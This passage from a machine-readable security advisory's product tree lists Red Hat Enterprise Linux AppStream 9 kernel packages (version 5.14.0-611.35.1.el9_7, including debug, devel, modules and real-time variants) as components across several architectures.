"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch"
},
"product_reference": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
